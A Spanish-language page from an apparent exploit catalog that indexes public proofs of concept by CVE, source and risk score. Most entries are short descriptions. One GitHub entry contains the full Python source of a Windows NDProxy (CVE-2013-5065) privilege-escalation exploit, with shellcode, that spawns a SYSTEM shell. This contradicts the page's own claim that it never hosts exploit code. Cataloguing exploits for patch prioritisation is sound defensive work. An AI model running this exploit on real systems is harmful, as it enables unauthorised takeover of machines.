Explotación pública
Catálogo de exploits
Todo exploit público que catalogamos, en un solo índice. Busca por CVE, nombre del exploit o tecnología — y mira, al lado, lo que la falla realmente vale: severidad, probabilidad de explotación y si ya está bajo ataque.
81.064exploits catalogados
37.667CVEs con explotación pública
24.695probados en laboratorio
TodosExploit-DB 24.482Referência 24.044GitHub PoC 15.521VulnCheck XDB 9080Nuclei 4432Metasploit 3505✓ solo verificadosrecientespopularesriesgo
81.064 exploits
Exploit-DB✓ VexDay Proof
iScripts AutoHoster - 'checktransferstatusbck.php' SQL Injection
Multiple SQL injection vulnerabilities in iScripts AutoHoster, possibly 2.4, allow remote attackers to execute arbitrary
23RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
iScripts AutoHoster - 'tmpid' Local File Inclusion
Multiple directory traversal vulnerabilities in iScripts AutoHoster, possibly 2.4, allow remote attackers to read arbitr
23RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
iScripts AutoHoster - 'main_smtp.php' Traversal
Multiple directory traversal vulnerabilities in iScripts AutoHoster, possibly 2.4, allow remote attackers to read arbitr
23RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
iScripts AutoHoster - 'id' Local File Inclusion
Multiple directory traversal vulnerabilities in iScripts AutoHoster, possibly 2.4, allow remote attackers to read arbitr
23RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
iScripts AutoHoster - 'invno' SQL Injection
Multiple SQL injection vulnerabilities in iScripts AutoHoster, possibly 2.4, allow remote attackers to execute arbitrary
23RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
Nagios XI - 'tfPassword' SQL Injection
SQL injection vulnerability in functions/prepend_adm.php in Nagios Core Config Manager in Nagios XI before 2012R2.4 allo
23RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
Dynamic Biz Website Builder (QuickWeb) 1.0 - '/apps/news-events/newdetail.asp?id' SQL Injection
Multiple SQL injection vulnerabilities in Dynamic Biz Website Builder (QuickWeb) allow remote attackers to execute arbit
23RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
Dynamic Biz Website Builder 'QuickWeb' 1.0 - '/login.asp' Multiple Field SQL Injections / Authentication Bypass
Multiple SQL injection vulnerabilities in Dynamic Biz Website Builder (QuickWeb) allow remote attackers to execute arbit
23RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
Joomla! Component Projoom NovaSFH 3.0.2 - 'upload.php' Arbitrary File Upload
views/upload.php in the ProJoom Smart Flash Header (NovaSFH) component 3.0.2 and earlier for Joomla! allows remote attac
23RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
Cisco Unified Communications Manager - TFTP Service
The TFTP service in Cisco Unified Communications Manager (aka CUCM or Unified CM) allows remote attackers to obtain sens
41RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
eduTrac - 'showmask' Directory Traversal
Directory traversal vulnerability in 7 Media Web Solutions eduTrac before 1.1.2 allows remote attackers to read arbitrar
23RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
Adobe ColdFusion 9 - Administrative Authentication Bypass (Metasploit)
administrator.cfc in Adobe ColdFusion 9.0, 9.0.1, 9.0.2, and 10 allows remote attackers to bypass authentication and pos
100RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
vBulletin 5 - 'index.php/ajax/api/reputation/vote?nodeid' SQL Injection (Metasploit)
SQL injection vulnerability in index.php/ajax/api/reputation/vote in vBulletin 5.0.0 Beta 11, 5.0.0 Beta 28, and earlier
43RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
HP LoadRunner EmulationAdmin - Web Service Directory Traversal (Metasploit)
Unspecified vulnerability in Virtual User Generator in HP LoadRunner before 11.52 allows remote attackers to execute arb
50RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
IcoFX 2.5.0.0 - '.ico' Buffer Overflow (PoC)
Stack-based buffer overflow in IcoFX 2.5 and earlier allows remote attackers to execute arbitrary code via a long idCoun
50RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
eFront 3.6.14 (build 18012) - Multiple Persistent Cross-Site Scripting Vulnerabilities
Multiple cross-site scripting (XSS) vulnerabilities in www/administrator.php in eFront 3.6.14 (build 18012) allow remote
23RIESGO
abrir ↗Exploit-DB
EMC Data Protection Advisor DPA Illuminator - EJBInvokerServlet Remote Code Execution
The (1) JMXInvokerHAServlet and (2) EJBInvokerHAServlet invoker servlets in JBoss Enterprise Application Platform (EAP)
28RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
RedHat Piranha - Remote Security Bypass
The Piranha Configuration Tool in Piranha 0.8.6 does not properly restrict access to webpages, which allows remote attac
23RIESGO
abrir ↗Metasploit300
Adobe Flash Player Type Confusion Remote Code Execution
Adobe Flash Player before 11.7.700.257 and 11.8.x and 11.9.x before 11.9.900.170 on Windows and Mac OS X and before 11.2
60RIESGO
abrir ↗Metasploit300
IcoFX Stack Buffer Overflow
Stack-based buffer overflow in IcoFX 2.5 and earlier allows remote attackers to execute arbitrary code via a long idCoun
50RIESGO
abrir ↗Metasploit500
MS13-097 Registry Symlink IE Sandbox Escape
Microsoft Internet Explorer 10 and 11 allows local users to bypass the Protected Mode protection mechanism, and conseque
43RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
Linux Kernel 3.0.5 - 'ath9k_htc_set_bssid_mask()' Information Disclosure
The ath9k_htc_set_bssid_mask function in drivers/net/wireless/ath/ath9k/htc_drv_main.c in the Linux kernel through 3.12
28RIESGO
abrir ↗Metasploit600
ElasticSearch Dynamic Script Arbitrary Java Execution
The default configuration in Elasticsearch before 1.2 enables dynamic scripting, which allows remote attackers to execut
100RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
WordPress Plugin Download Manager Free & Pro 2.5.8 - Persistent Cross-Site Scripting
Cross-site scripting (XSS) vulnerability in the Download Manager plugin before 2.5.9 for WordPress allows remote attacke
23RIESGO
abrir ↗GitHub PoC
# NDPROXY Local SYSTEM privilege escalation # http://www.offensive-security.com # Tested on Windows XP SP3 # http://www.offensive-security.com/vulndev/ndproxy-local-system-exploit-cve-2013-5065/ # Original crash ... null pointer dereference # Access violation - code c0000005 (!!! second chance !!!) # 00000038 ?? ??? from ctypes import * from ctypes.wintypes import * import os, sys kernel32 = windll.kernel32 ntdll = windll.ntdll GENERIC_READ = 0x80000000 GENERIC_WRITE = 0x40000000 FILE_SHARE_READ = 0x00000001 FILE_SHARE_WRITE = 0x00000002 NULL = 0x0 OPEN_EXISTING = 0x3 PROCESS_VM_WRITE = 0x0020 PROCESS_VM_READ = 0x0010 MEM_COMMIT = 0x00001000 MEM_RESERVE = 0x00002000 MEM_FREE = 0x00010000 PAGE_EXECUTE_READWRITE = 0x00000040 PROCESS_ALL_ACCESS = 2097151 FORMAT_MESSAGE_FROM_SYSTEM = 0x00001000 baseadd = c_int(0x00000001) MEMRES = (0x1000 | 0x2000) MEM_DECOMMIT = 0x4000 PAGEEXE = 0x00000040 null_size = c_int(0x1000) STATUS_SUCCESS = 0 def log(msg): print msg def getLastError(): """[-] Format GetLastError""" buf = create_string_buffer(2048) if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL, kernel32.GetLastError(), 0, buf, sizeof(buf), NULL): log(buf.value) else: log("[-] Unknown Error") print "[*] Microsoft Windows NDProxy CVE-2013-5065 0day" print "[*] Vulnerability found in the wild" print "[*] Coded by Offensive Security" tmp = ("\x00"*4)*5 + "\x25\x01\x03\x07" + "\x00"*4 + "\x34\x00\x00\x00" + "\x00"*(84-24) InBuf = c_char_p(tmp) dwStatus = ntdll.NtAllocateVirtualMemory(0xFFFFFFFF, byref(baseadd), 0x0, byref(null_size), MEMRES, PAGEEXE) if dwStatus != STATUS_SUCCESS: print "[+] Something went wrong while allocating the null paged memory: %s" % dwStatus getLastError() written = c_ulong() sh = "\x90\x33\xC0\x64\x8B\x80\x24\x01\x00\x00\x8B\x40\x44\x8B\xC8\x8B\x80\x88\x00\x00\x00\x2D\x88\x00\x00\x00\x83\xB8\x84\x00\x00\x00\x04\x75\xEC\x8B\x90\xC8\x00\x00\x00\x89\x91\xC8\x00\x00\x00\xC3" sc = "\x90"*0x38 + "\x3c\x00\x00\x00" + "\x90"*4 + sh + "\xcc"*(0x400-0x3c-4-len(sh)) alloc = kernel32.WriteProcessMemory(0xFFFFFFFF, 0x00000001, sc, 0x400, byref(written)) if alloc == 0: print "[+] Something went wrong while writing our junk to the null paged memory: %s" % alloc getLastError() dwRetBytes = DWORD(0) DEVICE_NAME = "\\\\.\\NDProxy" hdev = kernel32.CreateFileA(DEVICE_NAME, 0, 0, None, OPEN_EXISTING , 0, None) if hdev == -1: print "[-] Couldn't open the device... :(" sys.exit() kernel32.DeviceIoControl(hdev, 0x8fff23cc, InBuf, 0x54, InBuf, 0x24, byref(dwRetBytes), 0) kernel32.CloseHandle(hdev) print "[+] Spawning SYSTEM Shell..." os.system("start /d \"C:\\windows\\system32\" cmd.exe")
NDProxy.sys in the kernel in Microsoft Windows XP SP2 and SP3 and Server 2003 SP2 allows local users to gain privileges
98RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
Enorth Webpublisher CMS - 'thisday' SQL Injection
SQL injection vulnerability in m_worklog/log_searchday.jsp in Enorth Webpublisher CMS, possibly 5.0 and earlier, allows
23RIESGO
abrir ↗Metasploit600
Zimbra Collaboration Server LFI
Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zim
60RIESGO
abrir ↗Exploit-DB
D-Link DSR Router Series - Remote Command Execution
Multiple SQL injection vulnerabilities in D-Link DSR-150 with firmware before 1.08B44; DSR-150N with firmware before 1.0
23RIESGO
abrir ↗Exploit-DB✓ VexDay Proof
Zimbra 2009-2013 - Local File Inclusion
Directory traversal vulnerability in /res/I18nMsg,AjxMsg,ZMsg,ZmMsg,AjxKeys,ZmKeys,ZdMsg,Ajx%20TemplateMsg.js.zgz in Zim
60RIESGO
abrir ↗Indexamos solo el enlace público a la prueba de concepto — nunca alojamos ni redistribuimos código de explotación. Fuentes: PoC-in-GitHub, Exploit-DB, Nuclei, Metasploit y VulnCheck XDB. La existencia de PoC pública no significa que la falla sea explotable en tu entorno.